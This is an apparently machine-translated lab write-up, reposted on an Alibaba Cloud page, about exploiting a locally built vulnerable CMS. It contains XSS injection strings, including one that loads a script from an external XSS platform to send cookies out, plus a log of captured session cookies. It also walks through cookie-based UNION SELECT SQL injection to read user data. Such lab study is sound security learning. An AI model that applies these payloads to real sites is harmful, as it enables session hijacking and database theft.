XSS and SQL injection Learning 1

Source: Internet
Author: User

Build a vulnerable web site locally to verify XSS vulnerabilities and how SQL injection is exploited.

Use the Phpstudy tool to build a gourmet CMS website platform.

0x01 XSS Test

To open debug mode, locate the name bar input box:

Try inserting the XSS attack code in value:

123 "><script>alert (Document.cookie);</script></td><td>

Click Update to successfully pop up the cookie information on the website after login. Note that this input box does not filter the <script> tags.

If you want to send this cookie to your XSS platform, you can construct the following input:

"/></td><script src=\" Http://\ "></script><td>

Http:// the code to obtain information such as cookies for the local XSS platform.

You can see the following information locally: including cookie,user_agent,ipaddress and other information.

COOKIE:PHPSESSID=7URAPQFNC9CCHS31LFU38U0PI4; Member_user=xdcms; Member_userid=3
Http_user_agent mozilla/5.0 (Windows NT 6.1; Win64; x64) applewebkit/537.36 (khtml, like Gecko) chrome/61.0.3163.100 safari/537.36
[30/oct/2017 16:04:36] "GET/?do=api&id=2j1h&location=http%3a//www.xdcms.com/index.php%3fm%3dmember%26f%3dedit&toplocation =http%3a//www.xdcms.com/index.php%3fm%3dmember%26f%3dedit&cookie=phpsessid%3d7urapqfnc9cchs31lfu38u0pi4%3b %20member_user%3dxdcms%
3b%20member_userid%3d3&opener= http/1.1 "200 3

View the background database, found that the code is written to the database, do not know whether the storage-type XSS??? In summary, this will send cookie information to the XSS platform each time the page is refreshed.

0x02 SQL injection Test

The code of the time background PHP, found the input interface with MySQL Interactive statement:

The input parameter $userid the Member_userid parameter from the cookie, so the cookie injection method is used here.

Download a cookie Modify plugin, modify Member_userid

When Member_userid=1, the name is test, which can be seen by modifying this cookie value to read the database.

Use the Union Select to try to get more database information.

Test found member_userid=4 time, the name of the phone is empty, indicating that the database only 3 records;

Union Select,...... , the following error occurred:

There is a different number of columns, which shows that union select does not have the same number of columns as the table, and attempts to find 15 without an error:

From this display can be seen, user name, mobile phone number, name, security mailbox, contact address is the table of 3,13,12,15,14 column. You can export database information in these places.

XSS and SQL injection Learning 1

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.